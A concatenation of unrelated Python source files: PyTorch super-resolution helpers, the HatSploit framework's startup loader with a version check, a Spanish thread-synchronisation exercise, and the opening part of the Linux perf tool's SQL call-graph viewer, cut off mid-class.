log_len = int(min(4, max(0, math.log10(abs(n)))))
return '{:.{}f}'.format(n, 4 - log_len)
def save_with_exception(obj, name):
try:
dirname = path.dirname(name)
if dirname:
os.makedirs(dirname, exist_ok=True)
torch.save(obj, name)
except IOError as io_error:
print('Fail to save {}!'.format(name))
print(io_error)
except Exception as e:
print(e)
def to(obj, gpus='auto', precision='single'):
'''
A simple and convinient wrapper for torch.to()
'''
if gpus == 'auto':
if torch.cuda.is_available():
gpus = 1
else:
gpus = 0
if gpus > 0:
device = torch.device('cuda')
else:
device = torch.device('cpu')
if precision == 'half':
dtype = torch.half
else:
dtype = None
return obj.to(device=device, dtype=dtype)
class SRMisc(object):
'''
Miscellaneous things for super-resolution
'''
def __init__(self, cfg=None):
self.queue = None
if cfg is not None:
self.print_every = cfg.print_every
else:
self.print_every = 100
def is_print(self, batch):
return (batch + 1) % self.print_every == 0
def quantize(self, *xs):
'''
Quantize -1 ~ 1 to 0 ~ 255.
Args:
Return:
'''
rgb = 255
_quantize = lambda x: x.add(1).mul(rgb / 2).round().clamp(0, rgb)
if len(xs) == 1:
return _quantize(xs[0])
else:
return [_quantize(x) for x in xs]
def begin_background(self):
self.queue = multiprocessing.Queue()
def target(queue):
while True:
if queue.empty():
continue
name, x = queue.get()
if name is None:
return
try:
if '.pt' in name:
with open(name, 'wb') as f:
pickle.dump(x, f)
elif '.jp' in name or '.JP' in name:
imageio.imwrite(name, x, quality=100)
else:
imageio.imwrite(name, x)
except IOError as io_error:
print('Cannot save image file!')
print(io_error)
except Exception as e:
print(e)
sys.exit(1)
def worker():
return multiprocessing.Process(target=target, args=(self.queue,))
self.process = [worker() for _ in range(multiprocessing.cpu_count())]
for p in self.process:
p.start()
def end_background(self):
if self.queue is None:
return
for _ in self.process:
self.queue.put((None, None))
def join_background(self):
if self.queue is None:
return
while not self.queue.empty():
time.sleep(0.5)
for p in self.process:
p.join()
self.queue = None
@staticmethod
def tensor2np(x):
x = x.permute(1, 2, 0)
x = x.byte().cpu().numpy()
return x
def save(self, x, save_as, name, exts='.png', single=False):
'''
Save output result as images
Args:
x (dict or Tensor): an image, or images with their keys
save_as (str): name of the subdirectory
name (str): name of the file
'''
if not isinstance(exts, (list, tuple)):
exts = (exts,)
y = {}
for ext in exts:
if isinstance(x, dict):
for k ,v in x.items():
y['{}_{}{}'.format(name, k, ext)] = v
else:
y['{}{}'.format(name, ext)] = x
os.makedirs(save_as, exist_ok=True)
if self.queue is None:
try:
self.begin_background()
except Exception as e:
print('Cannot start threads!')
print(e)
return
for k, v in y.items():
name = path.join(save_as, k)
v = self.quantize(v)
if v.size(0) > 1:
vutils.save_image(v / 255, name, nrow=16, padding=0)
else:
v = SRMisc.tensor2np(v[0])
self.queue.put((name, v))
if single:
self.end_background()
self.join_background()
|
loader.py | #!/usr/bin/env python3
#
# MIT License
#
# Copyright (c) 2020-2021 EntySec
#
# Permission is hereby granted, free of charge, to any person obtaining a copy
# of this software and associated documentation files (the "Software"), to deal
# in the Software without restriction, including without limitation the rights
# to use, copy, modify, merge, publish, distribute, sublicense, and/or sell
# copies of the Software, and to permit persons to whom the Software is
# furnished to do so, subject to the following conditions:
#
# The above copyright notice and this permission notice shall be included in all
# copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY,
# FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE
# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#
import sys
import time
import threading
import os
import string
import requests
from core.cli.badges import badges
from core.db.importer import importer
from core.base.config import config
class loader:
def __init__(self):
self.badges = badges()
self.importer = importer()
self.config = config()
def load_update_process(self):
remote_config = requests.get('https://raw.githubusercontent.com/EntySec/HatSploit/main/config/core_config.yml', stream=True)
remote_config = remote_config.content
if self.config.get_config_file(remote_config)['details']['version'] != self.config.core_config['details']['version']:
self.badges.output_warning("Your HatSploit Framework is out-dated.")
self.badges.output_information("Consider running ./update.sh")
time.sleep(1)
def load_components(self):
self.importer.import_all()
def load_everything(self):
self.load_update_process()
self.load_components()
def load_all(self):
loading_process = threading.Thread(target=self.load_everything)
loading_process.start()
base_line = "Loading the HatSploit Framework..."
cycle = 0
while loading_process.is_alive():
for char in "/-\|":
status = base_line + char + "\r"
cycle += 1
if status[cycle % len(status)] in list(string.ascii_lowercase):
status = status[:cycle % len(status)] + status[cycle % len(status)].upper() + status[cycle % len(status) + 1:]
elif status[cycle % len(status)] in list(string.ascii_uppercase):
status = status[:cycle % len(status)] + status[cycle % len(status)].lower() + status[cycle % len(status) + 1:]
sys.stdout.write(self.badges.P + status)
time.sleep(.1)
sys.stdout.flush()
loading_process.join()
|
Proyecto2sistop.py | # -*- coding: utf-8 -*-
"""
Created on Sat Apr 11 02:52:43 2020
@name: El plato de comida para perros
@author: Fernando Arturo Medina Molina
@contact: fernando170@comunidad.unam.mx
@version: 1.0
@description:
A travรฉs de รฉste cรณdigo se pretende dar soluciรณn al problema de
sincronizaciรณn de hilos planteado en el archivo README.md dentro de este
repositorio, las variables se explicaran en el apartado @variables, para
resolver la problemรกtica planteada he decidido utilizar el mรกs comรบn de las
implementaciรณnes que es la de hacer un mutex con la finalidad de que el
alimento pueda restarsele la cantidad de alimento que el perro desee en
cada ocasiรณn.
@variables:
cantidadDeCroquetas: Serรก la cantidad en gramos de comida que se le da a
los perros. :int:
perroG: Serรก la representaciรณn del perro mรกs grande como un hilo y podrรก
comer hasta 300 gramos por ocasiรณn.
perroM: Serรก la representaciรณn del perro mediano de igual manera con un
hilo, este podrรก consumir hasta 100 gramos.
perroC: Serรก la representaciรณn del perro pequeรฑo igualmente con un hilo, el
cual puede consumir hasta 50 gramos de alimento por ocasiรณn.
plato: Serรก el recurso que se compartirรก por los perros, en el estรก
contenido la cantidad de alimento servida en esa ocasiรณn.
tDeCons: Tiempo que tardarรก el perro en consumir su alimento. :int:
"""
import threading
import time
cantidadDeCroquetas=450
def consumo(cantidad,tDeCons,perro):
"""
Una vez que el perro se acerque al plato y lo posea, รฉste podrรก consumir la
cantidad adecuada establecida por su tamaรฑo.
:param cantidad: Serรก la cantidad de alimento que consume el perro en esa
ocasiรณn:int
"""
global cantidadDeCroquetas
print('El perro '+perro+' estรก comiendo')
time.sleep(tDeCons)
cantidadDeCroquetas=cantidadDeCroquetas - cantidad
print('Cantidad de croquedas actual: '+str(cantidadDeCroquetas)+' gramos\n\n\n')
if cantidadDeCroquetas==0:
print('Ya no quedan croquetas!!! a ladrar para que nos hagan caso.')
def comer(plato,cantidad,tDeCons,perro):
'''
El perro en acercarse primero, serรก el que tenga la oportunidad de
alimentarse en ese momento ya que poseerรก el plato.
:param plato: Simularรก la funciรณn del plato, ya que solo existe uno y es al
que se le quitarรก la comida que les fue suministrada.:recurso protegido
:param cantidad: serรก la cantidad de comida consumida en esta ocasiรณn por
el perro, variarรก segรบn su tamaรฑo:int
'''
plato.acquire()#Adquisiciรณn del plato
consumo(cantidad,tDeCons,perro)#Llamada a la funciรณn consumo
plato.release()#El perro ahora estรก satisfecho, puede ir a descansar
print('Plato servido!!! A comer!')
print('Cantidad de croquetas actual: '+str(cantidadDeCroquetas)+' gramos\n\n\n')
plato=threading.Lock()#El plato serรก el recurso protegido
perroG=threading.Thread(target=comer,args=(plato,300,5,'grande'))
perroM=threading.Thread(target=comer,args=(plato,100,3,'mediano'))
perroC=threading.Thread(target=comer,args=(plato,50,2,'chico'))
perroG.start()
perroM.start()
perroC.start()
perroG.join()
perroM.join()
perroC.join() |
exported-sql-viewer.py | #!/usr/bin/env python
# SPDX-License-Identifier: GPL-2.0
# exported-sql-viewer.py: view data from sql database
# Copyright (c) 2014-2018, Intel Corporation.
# To use this script you will need to have exported data using either the
# export-to-sqlite.py or the export-to-postgresql.py script. Refer to those
# scripts for details.
#
# Following on from the example in the export scripts, a
# call-graph can be displayed for the pt_example database like this:
#
# python tools/perf/scripts/python/exported-sql-viewer.py pt_example
#
# Note that for PostgreSQL, this script supports connecting to remote databases
# by setting hostname, port, username, password, and dbname e.g.
#
# python tools/perf/scripts/python/exported-sql-viewer.py "hostname=myhost username=myuser password=mypassword dbname=pt_example"
#
# The result is a GUI window with a tree representing a context-sensitive
# call-graph. Expanding a couple of levels of the tree and adjusting column
# widths to suit will display something like:
#
# Call Graph: pt_example
# Call Path Object Count Time(ns) Time(%) Branch Count Branch Count(%)
# v- ls
# v- 2638:2638
# v- _start ld-2.19.so 1 10074071 100.0 211135 100.0
# |- unknown unknown 1 13198 0.1 1 0.0
# >- _dl_start ld-2.19.so 1 1400980 13.9 19637 9.3
# >- _d_linit_internal ld-2.19.so 1 448152 4.4 11094 5.3
# v-__libc_start_main@plt ls 1 8211741 81.5 180397 85.4
# >- _dl_fixup ld-2.19.so 1 7607 0.1 108 0.1
# >- __cxa_atexit libc-2.19.so 1 11737 0.1 10 0.0
# >- __libc_csu_init ls 1 10354 0.1 10 0.0
# |- _setjmp libc-2.19.so 1 0 0.0 4 0.0
# v- main ls 1 8182043 99.6 180254 99.9
#
# Points to note:
# The top level is a command name (comm)
# The next level is a thread (pid:tid)
# Subsequent levels are functions
# 'Count' is the number of calls
# 'Time' is the elapsed time until the function returns
# Percentages are relative to the level above
# 'Branch Count' is the total number of branches for that function and all
# functions that it calls
# There is also a "All branches" report, which displays branches and
# possibly disassembly. However, presently, the only supported disassembler is
# Intel XED, and additionally the object code must be present in perf build ID
# cache. To use Intel XED, libxed.so must be present. To build and install
# libxed.so:
# git clone https://github.com/intelxed/mbuild.git mbuild
# git clone https://github.com/intelxed/xed
# cd xed
# ./mfile.py --share
# sudo ./mfile.py --prefix=/usr/local install
# sudo ldconfig
#
# Example report:
#
# Time CPU Command PID TID Branch Type In Tx Branch
# 8107675239590 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea260 _start (ld-2.19.so)
# 7fab593ea260 48 89 e7 mov %rsp, %rdi
# 8107675239899 2 ls 22011 22011 hardware interrupt No 7fab593ea260 _start (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
# 8107675241900 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea260 _start (ld-2.19.so)
# 7fab593ea260 48 89 e7 mov %rsp, %rdi
# 7fab593ea263 e8 c8 06 00 00 callq 0x7fab593ea930
# 8107675241900 2 ls 22011 22011 call No 7fab593ea263 _start+0x3 (ld-2.19.so) -> 7fab593ea930 _dl_start (ld-2.19.so)
# 7fab593ea930 55 pushq %rbp
# 7fab593ea931 48 89 e5 mov %rsp, %rbp
# 7fab593ea934 41 57 pushq %r15
# 7fab593ea936 41 56 pushq %r14
# 7fab593ea938 41 55 pushq %r13
# 7fab593ea93a 41 54 pushq %r12
# 7fab593ea93c 53 pushq %rbx
# 7fab593ea93d 48 89 fb mov %rdi, %rbx
# 7fab593ea940 48 83 ec 68 sub $0x68, %rsp
# 7fab593ea944 0f 31 rdtsc
# 7fab593ea946 48 c1 e2 20 shl $0x20, %rdx
# 7fab593ea94a 89 c0 mov %eax, %eax
# 7fab593ea94c 48 09 c2 or %rax, %rdx
# 7fab593ea94f 48 8b 05 1a 15 22 00 movq 0x22151a(%rip), %rax
# 8107675242232 2 ls 22011 22011 hardware interrupt No 7fab593ea94f _dl_start+0x1f (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
# 8107675242900 2 ls 22011 22011 return from interrupt No ffffffff86a00a67 native_irq_return_iret ([kernel]) -> 7fab593ea94f _dl_start+0x1f (ld-2.19.so)
# 7fab593ea94f 48 8b 05 1a 15 22 00 movq 0x22151a(%rip), %rax
# 7fab593ea956 48 89 15 3b 13 22 00 movq %rdx, 0x22133b(%rip)
# 8107675243232 2 ls 22011 22011 hardware interrupt No 7fab593ea956 _dl_start+0x26 (ld-2.19.so) -> ffffffff86a012e0 page_fault ([kernel])
from __future__ import print_function
import sys
import argparse
import weakref
import threading
import string
try:
# Python2
import cPickle as pickle
# size of pickled integer big enough for record size
glb_nsz = 8
except ImportError:
import pickle
glb_nsz = 16
import re
import os
pyside_version_1 = True
if not "--pyside-version-1" in sys.argv:
try:
from PySide2.QtCore import *
from PySide2.QtGui import *
from PySide2.QtSql import *
from PySide2.QtWidgets import *
pyside_version_1 = False
except:
pass
if pyside_version_1:
from PySide.QtCore import *
from PySide.QtGui import *
from PySide.QtSql import *
from decimal import *
from ctypes import *
from multiprocessing import Process, Array, Value, Event
# xrange is range in Python3
try:
xrange
except NameError:
xrange = range
def printerr(*args, **keyword_args):
print(*args, file=sys.stderr, **keyword_args)
# Data formatting helpers
def tohex(ip):
if ip < 0:
ip += 1 << 64
return "%x" % ip
def offstr(offset):
if offset:
return "+0x%x" % offset
return ""
def dsoname(name):
if name == "[kernel.kallsyms]":
return "[kernel]"
return name
def findnth(s, sub, n, offs=0):
pos = s.find(sub)
if pos < 0:
return pos
if n <= 1:
return offs + pos
return findnth(s[pos + 1:], sub, n - 1, offs + pos + 1)
# Percent to one decimal place
def PercentToOneDP(n, d):
if not d:
return "0.0"
x = (n * Decimal(100)) / d
return str(x.quantize(Decimal(".1"), rounding=ROUND_HALF_UP))
# Helper for queries that must not fail
def QueryExec(query, stmt):
ret = query.exec_(stmt)
if not ret:
raise Exception("Query failed: " + query.lastError().text())
# Background thread
class Thread(QThread):
done = Signal(object)
def __init__(self, task, param=None, parent=None):
super(Thread, self).__init__(parent)
self.task = task
self.param = param
def run(self):
while True:
if self.param is None:
done, result = self.task()
else:
done, result = self.task(self.param)
self.done.emit(result)
if done:
break
# Tree data model
class TreeModel(QAbstractItemModel):
def __init__(self, glb, params, parent=None):
super(TreeModel, self).__init__(parent)
self.glb = glb
self.params = params
self.root = self.GetRoot()
self.last_row_read = 0
def Item(self, parent):
if parent.isValid():
return parent.internalPointer()
else:
return self.root
def rowCount(self, parent):
result = self.Item(parent).childCount()
if result < 0:
result = 0
self.dataChanged.emit(parent, parent)
return result
def hasChildren(self, parent):
return self.Item(parent).hasChildren()
def headerData(self, section, orientation, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(section)
if role != Qt.DisplayRole:
return None
if orientation != Qt.Horizontal:
return None
return self.columnHeader(section)
def parent(self, child):
child_item = child.internalPointer()
if child_item is self.root:
return QModelIndex()
parent_item = child_item.getParentItem()
return self.createIndex(parent_item.getRow(), 0, parent_item)
def index(self, row, column, parent):
child_item = self.Item(parent).getChildItem(row)
return self.createIndex(row, column, child_item)
def DisplayData(self, item, index):
return item.getData(index.column())
def FetchIfNeeded(self, row):
if row > self.last_row_read:
self.last_row_read = row
if row + 10 >= self.root.child_count:
self.fetcher.Fetch(glb_chunk_sz)
def columnAlignment(self, column):
return Qt.AlignLeft
def columnFont(self, column):
return None
def data(self, index, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(index.column())
if role == Qt.FontRole:
return self.columnFont(index.column())
if role != Qt.DisplayRole:
return None
item = index.internalPointer()
return self.DisplayData(item, index)
# Table data model
class TableModel(QAbstractTableModel):
def __init__(self, parent=None):
super(TableModel, self).__init__(parent)
self.child_count = 0
self.child_items = []
self.last_row_read = 0
def Item(self, parent):
if parent.isValid():
return parent.internalPointer()
else:
return self
def rowCount(self, parent):
return self.child_count
def headerData(self, section, orientation, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(section)
if role != Qt.DisplayRole:
return None
if orientation != Qt.Horizontal:
return None
return self.columnHeader(section)
def index(self, row, column, parent):
return self.createIndex(row, column, self.child_items[row])
def DisplayData(self, item, index):
return item.getData(index.column())
def FetchIfNeeded(self, row):
if row > self.last_row_read:
self.last_row_read = row
if row + 10 >= self.child_count:
self.fetcher.Fetch(glb_chunk_sz)
def columnAlignment(self, column):
return Qt.AlignLeft
def columnFont(self, column):
return None
def data(self, index, role):
if role == Qt.TextAlignmentRole:
return self.columnAlignment(index.column())
if role == Qt.FontRole:
return self.columnFont(index.column())
if role != Qt.DisplayRole:
return None
item = index.internalPointer()
return self.DisplayData(item, index)
# Model cache
model_cache = weakref.WeakValueDictionary()
model_cache_lock = threading.Lock()
def LookupCreateModel(model_name, create_fn):
model_cache_lock.acquire()
try:
model = model_cache[model_name]
except:
model = None
if model is None:
model = create_fn()
model_cache[model_name] = model
model_cache_lock.release()
return model
# Find bar
class FindBar():
def __init__(self, parent, finder, is_reg_expr=False):
self.finder = finder
self.context = []
self.last_value = None
self.last_pattern = None
label = QLabel("Find:")
label.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.textbox = QComboBox()
self.textbox.setEditable(True)
self.textbox.currentIndexChanged.connect(self.ValueChanged)
self.progress = QProgressBar()
self.progress.setRange(0, 0)
self.progress.hide()
if is_reg_expr:
self.pattern = QCheckBox("Regular Expression")
else:
self.pattern = QCheckBox("Pattern")
self.pattern.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)
self.next_button = QToolButton()
self.next_button.setIcon(parent.style().standardIcon(QStyle.SP_ArrowDown))
self.next_button.released.connect(lambda: self.NextPrev(1))
self.prev_button = QToolButton()
self.prev_button.setIcon(parent.style().standardIcon(QStyle.SP_ArrowUp))
self.prev_button.released.connect(lambda: self.NextPrev(-1))
self.close_button = QToolButton()
self.close_button.setIcon(parent.style().standardIcon(QStyle.SP_DockWidgetCloseButton))
self.close_button.released.connect(self.Deactivate)
self.hbox = QHBoxLayout()
self.hbox.setContentsMargins(0, 0, 0, 0)
self.hbox.addWidget(label)
self.hbox.addWidget(self.textbox)
self.hbox.addWidget(self.progress)
self.hbox.addWidget(self.pattern)
self.hbox.addWidget(self.next_button)
self.hbox.addWidget(self.prev_button)
self.hbox.addWidget(self.close_button)
self.bar = QWidget()
self.bar.setLayout(self.hbox)
self.bar.hide()
def Widget(self):
return self.bar
def Activate(self):
self.bar.show()
self.textbox.lineEdit().selectAll()
self.textbox.setFocus()
def Deactivate(self):
self.bar.hide()
def Busy(self):
self.textbox.setEnabled(False)
self.pattern.hide()
self.next_button.hide()
self.prev_button.hide()
self.progress.show()
def Idle(self):
self.textbox.setEnabled(True)
self.progress.hide()
self.pattern.show()
self.next_button.show()
self.prev_button.show()
def Find(self, direction):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
self.last_value = value
self.last_pattern = pattern
self.finder.Find(value, direction, pattern, self.context)
def ValueChanged(self):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
index = self.textbox.currentIndex()
data = self.textbox.itemData(index)
# Store the pattern in the combo box to keep it with the text value
if data == None:
self.textbox.setItemData(index, pattern)
else:
self.pattern.setChecked(data)
self.Find(0)
def NextPrev(self, direction):
value = self.textbox.currentText()
pattern = self.pattern.isChecked()
if value != self.last_value:
index = self.textbox.findText(value)
# Allow for a button press before the value has been added to the combo box
if index < 0:
index = self.textbox.count()
self.textbox.addItem(value, pattern)
self.textbox.setCurrentIndex(index)
return
else:
self.textbox.setItemData(index, pattern)
elif pattern != self.last_pattern:
# Keep the pattern recorded in the combo box up to date
index = self.textbox.currentIndex()
self.textbox.setItemData(index, pattern)
self.Find(direction)
def NotFound(self):
QMessageBox.information(self.bar, "Find", "'" + self.textbox.currentText() + "' not found")
# Context-sensitive call graph data model item base
class CallGraphLevelItemBase(object):
def __init__(self, glb, params, row, parent_item):
self.glb = glb
self.params = params
self.row = row
self.parent_item = parent_item
self.query_done = False
self.child_count = 0
self.child_items = []
if parent_item:
self.level = parent_item.level + 1
else:
self.level = 0
def getChildItem(self, row):
return self.child_items[row]
def getParentItem(self):
return self.parent_item
def getRow(self):
return self.row
def childCount(self):
if not self.query_done:
self.Select()
if not self.child_count:
return -1
return self.child_count
def hasChildren(self):
if not self.query_done:
return True
return self.child_count > 0
def getData(self, column):
return self.data[column]
# Context-sensitive call graph data model level 2+ item base
class CallGraphLevelTwoPlusItemBase(CallGraphLevelItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, call_path_id, time, insn_cnt, cyc_cnt, branch_count, parent_item):
super(CallGraphLevelTwoPlusItemBase, self).__init__(glb, params, row, parent_item)
self.comm_id = comm_id
self.thread_id = thread_id
self.call_path_id = call_path_id
self.insn_cnt = insn_cnt
self.cyc_cnt = cyc_cnt
self.branch_count = branch_count
self.time = time
def Select(self):
self.query_done = True
query = QSqlQuery(self.glb.db)
if self.params.have_ipc:
ipc_str = ", SUM(insn_count), SUM(cyc_count)"
else:
ipc_str = ""
QueryExec(query, "SELECT call_path_id, name, short_name, COUNT(calls.id), SUM(return_time - call_time)" + ipc_str + ", SUM(branch_count)"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" INNER JOIN dsos ON symbols.dso_id = dsos.id"
" WHERE parent_call_path_id = " + str(self.call_path_id) +
" AND comm_id = " + str(self.comm_id) +
" AND thread_id = " + str(self.thread_id) +
" GROUP BY call_path_id, name, short_name"
" ORDER BY call_path_id")
while query.next():
if self.params.have_ipc:
insn_cnt = int(query.value(5))
cyc_cnt = int(query.value(6))
branch_count = int(query.value(7))
else:
insn_cnt = 0
cyc_cnt = 0
branch_count = int(query.value(5))
child_item = CallGraphLevelThreeItem(self.glb, self.params, self.child_count, self.comm_id, self.thread_id, query.value(0), query.value(1), query.value(2), query.value(3), int(query.value(4)), insn_cnt, cyc_cnt, branch_count, self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model level three item
class CallGraphLevelThreeItem(CallGraphLevelTwoPlusItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, call_path_id, name, dso, count, time, insn_cnt, cyc_cnt, branch_count, parent_item):
super(CallGraphLevelThreeItem, self).__init__(glb, params, row, comm_id, thread_id, call_path_id, time, insn_cnt, cyc_cnt, branch_count, parent_item)
dso = dsoname(dso)
if self.params.have_ipc:
insn_pcnt = PercentToOneDP(insn_cnt, parent_item.insn_cnt)
cyc_pcnt = PercentToOneDP(cyc_cnt, parent_item.cyc_cnt)
br_pcnt = PercentToOneDP(branch_count, parent_item.branch_count)
ipc = CalcIPC(cyc_cnt, insn_cnt)
self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(insn_cnt), insn_pcnt, str(cyc_cnt), cyc_pcnt, ipc, str(branch_count), br_pcnt ]
else:
self.data = [ name, dso, str(count), str(time), PercentToOneDP(time, parent_item.time), str(branch_count), PercentToOneDP(branch_count, parent_item.branch_count) ]
self.dbid = call_path_id
# Context-sensitive call graph data model level two item
class CallGraphLevelTwoItem(CallGraphLevelTwoPlusItemBase):
def __init__(self, glb, params, row, comm_id, thread_id, pid, tid, parent_item):
super(CallGraphLevelTwoItem, self).__init__(glb, params, row, comm_id, thread_id, 1, 0, 0, 0, 0, parent_item)
if self.params.have_ipc:
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", "", "", "", "", "", ""]
else:
self.data = [str(pid) + ":" + str(tid), "", "", "", "", "", ""]
self.dbid = thread_id
def Select(self):
super(CallGraphLevelTwoItem, self).Select()
for child_item in self.child_items:
self.time += child_item.time
self.insn_cnt += child_item.insn_cnt
self.cyc_cnt += child_item.cyc_cnt
self.branch_count += child_item.branch_count
for child_item in self.child_items:
child_item.data[4] = PercentToOneDP(child_item.time, self.time)
if self.params.have_ipc:
child_item.data[6] = PercentToOneDP(child_item.insn_cnt, self.insn_cnt)
child_item.data[8] = PercentToOneDP(child_item.cyc_cnt, self.cyc_cnt)
child_item.data[11] = PercentToOneDP(child_item.branch_count, self.branch_count)
else:
child_item.data[6] = PercentToOneDP(child_item.branch_count, self.branch_count)
# Context-sensitive call graph data model level one item
class CallGraphLevelOneItem(CallGraphLevelItemBase):
def __init__(self, glb, params, row, comm_id, comm, parent_item):
super(CallGraphLevelOneItem, self).__init__(glb, params, row, parent_item)
if self.params.have_ipc:
self.data = [comm, "", "", "", "", "", "", "", "", "", "", ""]
else:
self.data = [comm, "", "", "", "", "", ""]
self.dbid = comm_id
def Select(self):
self.query_done = True
query = QSqlQuery(self.glb.db)
QueryExec(query, "SELECT thread_id, pid, tid"
" FROM comm_threads"
" INNER JOIN threads ON thread_id = threads.id"
" WHERE comm_id = " + str(self.dbid))
while query.next():
child_item = CallGraphLevelTwoItem(self.glb, self.params, self.child_count, self.dbid, query.value(0), query.value(1), query.value(2), self)
self.child_items.append(child_item)
self.child_count += 1
# Context-sensitive call graph data model root item
class CallGraphRootItem(CallGraphLevelItemBase):
def __init__(self, glb, params):
super(CallGraphRootItem, self).__init__(glb, params, 0, None)
self.dbid = 0
self.query_done = True
if_has_calls = ""
if IsSelectable(glb.db, "comms", columns = "has_calls"):
if_has_calls = " WHERE has_calls = TRUE"
query = QSqlQuery(glb.db)
QueryExec(query, "SELECT id, comm FROM comms" + if_has_calls)
while query.next():
if not query.value(0):
continue
child_item = CallGraphLevelOneItem(glb, params, self.child_count, query.value(0), query.value(1), self)
self.child_items.append(child_item)
self.child_count += 1
# Call graph model parameters
class CallGraphModelParams():
def __init__(self, glb, parent=None):
self.have_ipc = IsSelectable(glb.db, "calls", columns = "insn_count, cyc_count")
# Context-sensitive call graph data model base
class CallGraphModelBase(TreeModel):
def __init__(self, glb, parent=None):
super(CallGraphModelBase, self).__init__(glb, CallGraphModelParams(glb), parent)
def FindSelect(self, value, pattern, query):
if pattern:
# postgresql and sqlite pattern patching differences:
# postgresql LIKE is case sensitive but sqlite LIKE is not
# postgresql LIKE allows % and _ to be escaped with \ but sqlite LIKE does not
# postgresql supports ILIKE which is case insensitive
# sqlite supports GLOB (text only) which uses * and ? and is case sensitive
if not self.glb.dbref.is_sqlite3:
# Escape % and _
s = value.replace("%", "\%")
s = s.replace("_", "\_")
# Translate * and ? into SQL LIKE pattern characters % and _
trans = string.maketrans("*?", "%_")
match = " LIKE '" + str(s).translate(trans) + "'"
else:
match = " GLOB '" + str(value) + "'"
else:
match = " = '" + str(value) + "'"
self.DoFindSelect(query, match)
def Found(self, query, found):
if found:
return self.FindPath(query)
return []
def FindValue(self, value, pattern, query, last_value, last_pattern):
if last_value == value and pattern == last_pattern:
found = query.first()
else:
self.FindSelect(value, pattern, query)
found = query.next()
return self.Found(query, found)
def FindNext(self, query):
found = query.next()
if not found:
found = query.first()
return self.Found(query, found)
def FindPrev(self, query):
found = query.previous()
if not found:
found = query.last()
return self.Found(query, found)
def FindThread(self, c):
if c.direction == 0 or c.value != c.last_value or c.pattern != c.last_pattern:
ids = self.FindValue(c.value, c.pattern, c.query, c.last_value, c.last_pattern)
elif c.direction > 0:
ids = self.FindNext(c.query)
else:
ids = self.FindPrev(c.query)
return (True, ids)
def Find(self, value, direction, pattern, context, callback):
class Context():
def __init__(self, *x):
self.value, self.direction, self.pattern, self.query, self.last_value, self.last_pattern = x
def Update(self, *x):
self.value, self.direction, self.pattern, self.last_value, self.last_pattern = x + (self.value, self.pattern)
if len(context):
context[0].Update(value, direction, pattern)
else:
context.append(Context(value, direction, pattern, QSqlQuery(self.glb.db), None, None))
# Use a thread so the UI is not blocked during the SELECT
thread = Thread(self.FindThread, context[0])
thread.done.connect(lambda ids, t=thread, c=callback: self.FindDone(t, c, ids), Qt.QueuedConnection)
thread.start()
def FindDone(self, thread, callback, ids):
callback(ids)
# Context-sensitive call graph data model
class CallGraphModel(CallGraphModelBase):
def __init__(self, glb, parent=None):
super(CallGraphModel, self).__init__(glb, parent)
def GetRoot(self):
return CallGraphRootItem(self.glb, self.params)
def columnCount(self, parent=None):
if self.params.have_ipc:
return 12
else:
return 7
def columnHeader(self, column):
if self.params.have_ipc:
headers = ["Call Path", "Object", "Count ", "Time (ns) ", "Time (%) ", "Insn Cnt", "Insn Cnt (%)", "Cyc Cnt", "Cyc Cnt (%)", "IPC", "Branch Count ", "Branch Count (%) "]
else:
headers = ["Call Path", "Object", "Count ", "Time (ns) ", "Time (%) ", "Branch Count ", "Branch Count (%) "]
return headers[column]
def columnAlignment(self, column):
if self.params.have_ipc:
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
else:
alignment = [ Qt.AlignLeft, Qt.AlignLeft, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight, Qt.AlignRight ]
return alignment[column]
def DoFindSelect(self, query, match):
QueryExec(query, "SELECT call_path_id, comm_id, thread_id"
" FROM calls"
" INNER JOIN call_paths ON calls.call_path_id = call_paths.id"
" INNER JOIN symbols ON call_paths.symbol_id = symbols.id"
" WHERE symbols.name" + match +
" GROUP BY comm_id, thread_id, call_path_id"
" ORDER BY comm_id, thread_id, call_path_id")
def FindPath(self, query):
# Turn the query result into a list of ids that the tree view can walk
# to open the tree at the right place.
ids = []
parent_id = query.value(0)
while parent_id:
ids.insert(0, parent_id)
q2 = QSqlQuery(self.glb.db)
QueryExec(q2, "SELECT parent_id"
" FROM call_paths"
" WHERE id = " + str(parent_id))
if not q2.next():
break
parent_id = q2.value(0)
# The call path root is not used
if ids[0] == 1:
del ids[0]
ids.insert(0, query.value(2))
ids.insert(0, query.value(1))
return ids
# Call tree data model level 2+ item base
class CallTreeLevelTwoPlusItemBase(CallGraphLevelItemBase):
